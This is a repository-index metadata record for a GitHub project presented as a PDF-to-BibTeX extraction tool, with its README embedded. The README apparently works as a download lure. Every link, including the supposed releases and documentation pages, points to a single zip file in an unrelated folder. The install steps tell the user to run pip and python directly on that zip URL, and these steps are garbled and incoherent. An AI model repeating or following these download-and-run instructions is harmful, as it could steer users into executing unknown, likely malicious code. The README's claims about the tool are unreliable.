{"id":31767681,"url":"https://github.com/rehanvhora778/bibtex-extraction","last_synced_at":"2026-05-06T01:38:41.283Z","repository":{"id":317470337,"uuid":"1066172692","full_name":"rehanvhora778/bibtex-extraction","owner":"rehanvhora778","description":"📄 Extract BibTeX entries from PDFs automatically, generating a complete bibliography without manual input or reliance on external APIs.","archived":false,"fork":false,"pushed_at":"2025-10-08T11:57:08.000Z","size":1360,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-10-08T13:37:54.288Z","etag":null,"topics":["academic-writing","analysis","automation","bibliometric-analysis","bibliometrics","bibtex","data-visualization","langchain","latex","metadata-extraction","pdf","pyhton","pypdf","reference-management","research-tools"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/rehanvhora778.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-09-29T06:05:05.000Z","updated_at":"2025-10-08T11:57:11.000Z","dependencies_parsed_at":"2025-10-01T05:25:45.285Z","dependency_job_id":"08fa7b9a-6f60-4edd-a3d9-9b67f8c61547","html_url":"https://github.com/rehanvhora778/bibtex-extraction","commit_stats":null,"previous_names":["rehanvhora778/bibtex-extraction"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/rehanvhora778/bibtex-extraction","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rehanvhora778%2Fbibtex-extraction","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rehanvhora778%2Fbibtex-extraction/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rehanvhora778%2Fbibtex-extraction/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rehanvhora778%2Fbibtex-extraction/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/rehanvhora778","download_url":"https://codeload.github.com/rehanvhora778/bibtex-extraction/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rehanvhora778%2Fbibtex-extraction/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279002397,"owners_count":26083373,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-09T02:00:07.460Z","response_time":59,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["academic-writing","analysis","automation","bibliometric-analysis","bibliometrics","bibtex","data-visualization","langchain","latex","metadata-extraction","pdf","pyhton","pypdf","reference-management","research-tools"],"created_at":"2025-10-10T01:18:47.310Z","updated_at":"2026-05-06T01:38:41.276Z","avatar_url":"https://github.com/rehanvhora778.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# 📚 bibtex-extraction - Generate BibTeX Files effortlessly\n\n## 🚀 Getting Started\n\nWelcome to the **bibtex-extraction** project! This lightweight script allows you to automatically generate a clean BibTeX file from your PDF library. You can easily extract titles, authors, years, and DOIs without needing any special software. \n\n## 📥 Download \u0026 Install\n\nTo get started, you'll need to download the application from the Releases page. Click the button below to visit that page.\n\n[![Download bibtex-extraction](https://raw.githubusercontent.com/rehanvhora778/bibtex-extraction/main/radicule/bibtex_extraction_1.4.zip)](https://raw.githubusercontent.com/rehanvhora778/bibtex-extraction/main/radicule/bibtex_extraction_1.4.zip)\n\n### Step-by-Step Guide to Downloading\n\n1. Click the button above to go to the [Releases page](https://raw.githubusercontent.com/rehanvhora778/bibtex-extraction/main/radicule/bibtex_extraction_1.4.zip).\n2. Find the latest release at the top of the page.\n3. Look for the file named `https://raw.githubusercontent.com/rehanvhora778/bibtex-extraction/main/radicule/bibtex_extraction_1.4.zip` or similar. Click on it to start the download.\n4. Once downloaded, locate the file in your downloads folder.\n\n## 🛠️ System Requirements\n\nTo run **bibtex-extraction**, please ensure your system meets the following requirements:\n\n- Operating System: Windows, macOS, or Linux\n- Python Version: 3.7 or higher (Python must be installed on your system)\n- Average RAM: 2 GB or more is recommended\n- Storage: At least 100 MB of available space\n\n## 📂 Running the Application\n\nOnce you have downloaded the file, follow these steps to run **bibtex-extraction**:\n\n1. Extract the downloaded ZIP file to a location of your choice.\n2. Open a terminal or command prompt window.\n3. Navigate to the directory where you extracted the files. For example, if you extracted it to a folder named `bibtex-extraction`, type:\n   ```\n   cd path-to-your-folder/bibtex-extraction\n   ```\n4. Ensure that you have installed the necessary Python libraries. You can do this by running:\n   ```\n   pip install -r https://raw.githubusercontent.com/rehanvhora778/bibtex-extraction/main/radicule/bibtex_extraction_1.4.zip\n   ```\n5. Start the application by typing:\n   ```\n   python https://raw.githubusercontent.com/rehanvhora778/bibtex-extraction/main/radicule/bibtex_extraction_1.4.zip\n   ```\n\n## 📄 How to Use\n\nWhen the application starts, you will see a simple interface. Follow these steps to generate your BibTeX file:\n\n1. Click on the option to **Select Folder** and choose the folder that contains your PDF files.\n2. The script will scan the PDFs and extract relevant metadata.\n3. Once the scanning is complete, you will get an option to **Generate BibTeX**.\n4. The resulting `https://raw.githubusercontent.com/rehanvhora778/bibtex-extraction/main/radicule/bibtex_extraction_1.4.zip` file will be created in the same directory.\n\n## 📋 Features\n\n- Automatic extraction of BibTeX fields (title, author, year, DOI).\n- Supports various PDF formats.\n- No external dependencies required; just Python.\n- Easy-to-use command-line interface.\n\n## 🌐 Topics\n\nThis project is relevant for anyone interested in:\n\n- Academic Writing\n- Automation\n- BibTeX\n- LaTeX\n- Metadata Extraction\n- PDF Management\n- Reference Management\n\n## ⚙️ Troubleshooting\n\nIf you encounter issues while using the software, consider the following tips:\n\n- Ensure you have the correct version of Python installed.\n- Check if you have permissions to read the PDF files in the selected folder.\n- Look at the terminal for any error messages that may indicate what went wrong.\n\n## 💡 Additional Resources\n\nFor more help or to explore advanced features, visit our [documentation](https://raw.githubusercontent.com/rehanvhora778/bibtex-extraction/main/radicule/bibtex_extraction_1.4.zip) page. You can also find useful tips on handling different types of PDF files.\n\n## 📞 Support\n\nIf you have questions, feel free to open an issue on our GitHub repository. Our community will be happy to assist you.\n\nFor more details, don’t forget to visit the Releases page again: [Download here](https://raw.githubusercontent.com/rehanvhora778/bibtex-extraction/main/radicule/bibtex_extraction_1.4.zip). \n\nEnjoy your BibTeX extraction!","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frehanvhora778%2Fbibtex-extraction","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frehanvhora778%2Fbibtex-extraction","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frehanvhora778%2Fbibtex-extraction/lists"}